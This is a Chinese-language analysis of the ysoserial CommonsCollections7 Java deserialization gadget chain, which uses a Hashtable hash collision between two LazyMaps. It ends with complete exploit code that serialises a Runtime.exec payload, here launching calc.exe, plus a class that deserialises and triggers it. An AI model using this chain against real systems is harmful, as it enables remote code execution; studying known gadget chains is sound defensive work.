前言:
CommonsCollections7外层也是一条新的构造链,外层由hashtable的readObject进入,这条构造链挺有意思,因为用到了hash碰撞
yso构造分析:
首先构造进行rce所需要的转换链,这里也用的是chianed里面套Constantrans+invoketrans的方法
接着构造两个hashmap,通过lazymap的decorate用chained进行装饰后放进hashTable,这两个lazymap放进去的值也比较有讲究,要求计算出来的lazymap的hash相同
因为这里hashtable放进第二个lazymap时,因为两个lazymap的hash相同,所以将把第一个lazymap的key值yy放到第二个lazymap中(首先lazymap.get(‘yy’)尝试从第二个lazymap中拿),此时将导致lazymap2中新添加yy->processImpl键值对
为了让后面调用链时发生hash碰撞,所以这里要移除该键值对,为什么移除在后面调用链进行一个解释
调用链分析:
首先反序列化读出key和value,此时读出的key为lazymap,将重新装进hashtable中,这里调用reconstitutionPut,将会对key算一个hash和一个table的索引值,此时要判断是否该索引值处是否已经有元素,此时要判断已经放进的第一个lazymap的hash和当前key的hash是否相同,那么此时取出来的entry的key即为第一个lazymap,两个hash值是相同的,即
e.hash==hash,所以进入第二个判断两个lazymap是否完全相同
此时将调用AbstractMap的equals方法,入口参数值即为要放入的lazymap
此时将首先判断一下两个lazymap的大小一样不一样,因为之前构造payload的时候已经移除了第二个lazymap中yy->yy键值对,因此此时两个lazymap的空间大小一致都为1
此时遍历该map,首先将取出第一个lazymap中key和value为yy->1,如果value为null,则如果从第二个lazymap中取出该key的value不为null并且第二个lazymap包含该key,则判断两个lazymap不一样,但是这里value不为null,因此进入else判断,即判断两个lazymap的value是否相同,此时调用第二个lazymap的get函数,key即为yy
那么调用了lazymap.get,就又回到了我们之前的套路了,调用this.factory.transform
此时接着就是调用chainedtransformer的transform进行rce了
手动exp构造:
exp.java
package CommonsCollections7; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import java.io.*; import java.util.HashMap; import java.util.Hashtable; import java.util.Map; public class exp { public static void main(String[] args) throws IOException { Transformer[] trans = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null} ), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}) }; ChainedTransformer chain = new ChainedTransformer(trans); //构造两个hash值相同的lazymap Map innerMap1 = new HashMap(); Map innerMap2 = new HashMap(); Map lazyMap1 = LazyMap.decorate(innerMap1,chain); lazyMap1.put("yy",1); Map lazyMap2 = LazyMap.decorate(innerMap2, chain); lazyMap2.put("zZ",1); Hashtable hashTable = new Hashtable(); hashTable.put(lazyMap1,1); hashTable.put(lazyMap2,2); lazyMap2.remove("yy"); //序列化 File file; file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections7.ser"); ObjectOutputStream obj = new ObjectOutputStream(new FileOutputStream(file)); obj.writeObject(hashTable); } }
readObj.java
package CommonsCollections7; import java.io.*; public class readObj { public static void main(String[] args) throws IOException, ClassNotFoundException { File file; file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections7.ser"); ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file)); obj.readObject(); } }